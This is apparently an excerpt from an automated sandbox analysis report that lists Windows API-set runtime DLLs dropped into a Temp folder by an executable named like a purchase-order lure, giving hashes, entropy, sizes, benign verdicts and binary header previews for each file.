SHA-256:	44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
SHA-512:	6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-interlocked-l1-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17856
Entropy (8bit):	7.076803035880586
Encrypted:	false
SSDEEP:	192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
MD5:	D97A1CB141C6806F0101A5ED2673A63D
SHA1:	D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
SHA-256:	DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
SHA-512:	0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-libraryloader-l1-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.131154779640255
Encrypted:	false
SSDEEP:	384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
MD5:	D0873E21721D04E20B6FFB038ACCF2F1
SHA1:	9E39E505D80D67B347B19A349A1532746C1F7F88
SHA-256:	BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
SHA-512:	4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....ul...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....ul........A...T...T........ul........d................ul....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............ul....................(...p...........R...}..................Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-localization-l1-2-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20792
Entropy (8bit):	7.089032314841867
Encrypted:	false
SSDEEP:	384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
MD5:	EFF11130BFE0D9C90C0026BF2FB219AE
SHA1:	CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
SHA-256:	03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
SHA-512:	8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-memory-l1-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.101895292899441
Encrypted:	false
SSDEEP:	384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
MD5:	D500D9E24F33933956DF0E26F087FD91
SHA1:	6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
SHA-256:	BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
SHA-512:	C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...\|...................=...................................api-ms-win-core-memory-l1-1-0.dl

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-namedpipe-l1-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.16337963516533
Encrypted:	false
SSDEEP:	192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
MD5:	6F6796D1278670CCE6E2D85199623E27
SHA1:	8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
SHA-256:	C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
SHA-512:	6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processenvironment-l1-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19248
Entropy (8bit):	7.073730829887072
Encrypted:	false
SSDEEP:	192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
MD5:	5F73A814936C8E7E4A2DFD68876143C8
SHA1:	D960016C4F553E461AFB5B06B039A15D2E76135E
SHA-256:	96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
SHA-512:	77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...\|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processthreads-l1-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19392
Entropy (8bit):	7.082421046253008
Encrypted:	false
SSDEEP:	384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
MD5:	A2D7D7711F9C0E3E065B2929FF342666
SHA1:	A17B1F36E73B82EF9BFB831058F187535A550EB8
SHA-256:	9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
SHA-512:	D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processthreads-l1-1-1.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.1156948849491055
Encrypted:	false
SSDEEP:	384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
MD5:	D0289835D97D103BAD0DD7B9637538A1
SHA1:	8CEEBE1E9ABB0044808122557DE8AAB28AD14575
SHA-256:	91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
SHA-512:	97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-profile-l1-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17712
Entropy (8bit):	7.187691342157284
Encrypted:	false
SSDEEP:	192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
MD5:	FEE0926AA1BF00F2BEC9DA5DB7B2DE56
SHA1:	F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
SHA-256:	8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
SHA-512:	0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-rtlsupport-l1-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17720
Entropy (8bit):	7.19694878324007
Encrypted:	false
SSDEEP:	384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
MD5:	FDBA0DB0A1652D86CD471EAA509E56EA
SHA1:	3197CB45787D47BAC80223E3E98851E48A122EFA
SHA-256:	2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
SHA-512:	E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-string-l1-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.137724132900032
Encrypted:	false
SSDEEP:	384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
MD5:	12CC7D8017023EF04EBDD28EF9558305
SHA1:	F859A66009D1CAAE88BF36B569B63E1FBDAE9493
SHA-256:	7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
SHA-512:	F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-synch-l1-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20280
Entropy (8bit):	7.04640581473745
Encrypted:	false
SSDEEP:	384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
MD5:	71AF7ED2A72267AAAD8564524903CFF6
SHA1:	8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
SHA-256:	5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
SHA-512:	7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-synch-l1-2-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.138910839042951
Encrypted:	false
SSDEEP:	384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
MD5:	0D1AA99ED8069BA73CFD74B0FDDC7B3A
SHA1:	BA1F5384072DF8AF5743F81FD02C98773B5ED147
SHA-256:	30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
SHA-512:	6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...XuY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....XuY........9...T...T.......XuY........d...............XuY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...\|...............H...................A.....................................api-ms-win-core-synch-

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-sysinfo-l1-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19248
Entropy (8bit):	7.072555805949365
Encrypted:	false
SSDEEP:	384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
MD5:	19A40AF040BD7ADD901AA967600259D9
SHA1:	05B6322979B0B67526AE5CD6E820596CBE7393E4
SHA-256:	4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
SHA-512:	5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#\|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-timezone-l1-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18224
Entropy (8bit):	7.17450177544266
Encrypted:	false
SSDEEP:	384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
MD5:	BABF80608FD68A09656871EC8597296C
SHA1:	33952578924B0376CA4AE6A10B8D4ED749D10688
SHA-256:	24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
SHA-512:	3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-util-l1-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.1007227686954275
Encrypted:	false
SSDEEP:	192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
MD5:	0F079489ABD2B16751CEB7447512A70D
SHA1:	679DD712ED1C46FBD9BC8615598DA585D94D5D87
SHA-256:	F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
SHA-512:	92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-conio-l1-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.088693688879585
Encrypted:	false
SSDEEP:	384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
MD5:	6EA692F862BDEB446E649E4B2893E36F
SHA1:	84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
SHA-256:	9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
SHA-512:	9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-convert-l1-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22328
Entropy (8bit):	6.929204936143068
Encrypted:	false
SSDEEP:	384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
MD5:	72E28C902CD947F9A3425B19AC5A64BD
SHA1:	9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
SHA-256:	3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
SHA-512:	58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-environment-l1-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18736
Entropy (8bit):	7.078409479204304
Encrypted:	false
SSDEEP:	192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
MD5:	AC290DAD7CB4CA2D93516580452EDA1C
SHA1:	FA949453557D0049D723F9615E4F390010520EDA
SHA-256:	C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
